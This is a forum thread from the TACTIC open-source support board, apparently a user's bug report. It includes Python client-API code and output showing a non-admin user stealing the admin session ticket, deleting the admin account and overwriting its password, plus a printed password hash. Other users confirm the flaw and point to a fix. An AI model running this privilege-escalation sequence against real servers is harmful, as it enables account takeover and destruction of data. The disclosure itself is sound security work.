+- TACTIC Open Source (http://forum.southpawtech.com)
+-- Forum: TACTIC Open Source (http://forum.southpawtech.com/forumdisplay.php?fid=3)
+--- Forum: TACTIC Discussion (http://forum.southpawtech.com/forumdisplay.php?fid=4)
+--- Thread: client api: accessing sthpw search types using non admin user (/showthread.php?tid=249)
client api: accessing sthpw search types using non admin user - LazyLeopard - 11-17-2021
I am playing with the python client api at the moment. I have been able to get this sequence going.
Code:
import tactic_client_lib as tcl
server = tcl.TacticServerStub.get() # login using non-admin user
server.check_access('project', {'code', 'new_project'}, 'allow')
# False
ticket = server.query('sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'], single=True]
server.set_ticket(ticket['ticket'])
server.check_access('project', {'code', 'new_project'}, 'allow')
# TrueI am also able to query other `sthpw` search types including `sthpw/file` and `sthpw/snapshot`. All of which pound the db very heavily.
Actually, I can also don't need any special permissions to go ahead and delete the admin user
Code:
server.delete_sobject('sthpw/login?code=admin')
{'__search_key__': 'sthpw/login?code=admin',
'__search_type__': 'sthpw/login',
'code': 'admin',
'data': None,
'department': None,
'display_name': ', Admin',
'email': None,
'first_name': 'Admin',
'hourly_wage': None,
'id': 1,
'keywords': None,
'keywords_data': None,
'last_name': None,
'license_type': None,
'location': None,
'login': 'admin',
'login_attempt': None,
'login_groups': None,
'namespace': None,
'password': '$S$DCUJSVJNAiQgZrkG8WAGF0U7WkXge5RACaiIPXlQKd0rPZAc8bCg',
'phone_number': None,
'project_code': None,
's_status': None,
'snapshot': None,
'upn': 'admin'}or directly update its password without any problem!
Code:
user = server.get_by_search_key('sthpw/login?code=user')
server.update('sthpw/login?code=admin', {'password': user['password']})Is this intended behaviour?
What can I do to disable this?
RE: client api: accessing sthpw search types using non admin user - listy - 11-18-2021
1. Where are you running this code? From the script editor as admin ?
2. Print current login and ticket using api to make sure
RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-18-2021
(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin ?I am running this code from a python repl from my host against the docker 4.8.0 image.
2. Print current login and ticket using api to make sure
I login using the get_ticket + set_ticket sequence.
RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-19-2021
(11-18-2021, 04:58 PM)LazyLeopard Wrote:(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin ?I am running this code from a python repl from my host against the docker 4.8.0 image.
2. Print current login and ticket using api to make sure
I login using the get_ticket + set_ticket sequence.
For your convenience:
test_tactic.py
Code:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import tactic_client_lib as tcl
stub = tcl.TacticServerStub.get(setup=False)
stub.set_server('localhost')
ticket = stub.get_ticket('tactic', 'tactic123')
stub.set_ticket(ticket)
print('\nAcquired tactic ticket', ticket)
project_codes = stub.eval("@GET(sthpw/project.code)")
print('Project codes:', project_codes)
print('\nAccess status for tactic:')
print('===========================')
for pc in project_codes:
access = stub.check_access('project', {'code': pc}, 'allow')
print('project {pc} is {noaccess}accessible'.format(
pc=pc, noaccess='' if access else 'NOT '))
ticket = stub.query(
'sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'],
single=True)
print('\nAcquired ticket {ticket} for {login}!'.format(**ticket))
stub.set_ticket(ticket['ticket'])
print('\nAccess status for {login}:'.format(**ticket))
print('===========================')
for pc in project_codes:
access = stub.check_access('project', {'code': pc}, 'allow')
print('project {pc} is {noaccess}accessible'.format(
pc=pc, noaccess='' if access else 'not '))Windows CMD
Code:
(venv) D:\talha.ahmed\Workspace>python test_tactic.py
Acquired tactic ticket cbb9ad3e6aeca620192
Project codes: ['admin', 'episodic', 'important_project', 'new_project', 'sthpw']
Access status for tactic:
===========================
project admin is NOT accessible
project episodic is NOT accessible
project important_project is NOT accessible
project new_project is NOT accessible
project sthpw is NOT accessible
Acquired ticket 5cdf6ef2992669e88b2 for admin!
Access status for admin:
===========================
project admin is accessible
project episodic is accessible
project important_project is accessible
project new_project is accessible
project sthpw is accessibleRE: client api: accessing sthpw search types using non admin user - Diego - 11-22-2021
Hi LazyLeopard,
this is bad security bug!
I tracked it to src/pyasm/search/search.py
When api_mode is open (default) there is no check for access to some security critical tables
Could you open an Issue on github reporting the bug? I will make a PR to fix it...
RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-23-2021
Bug Report Posted:
https://github.com/Southpaw-TACTIC/TACTIC/issues/1694
RE: client api: accessing sthpw search types using non admin user - Diego - 11-23-2021
Thanks LazyLeopard!
I submitted a PR to fix the bug. I will update the docker images whenever Remko merge it.
If you want to test it, it's an easy edit on src/pyasm/search/search.py
Cheers.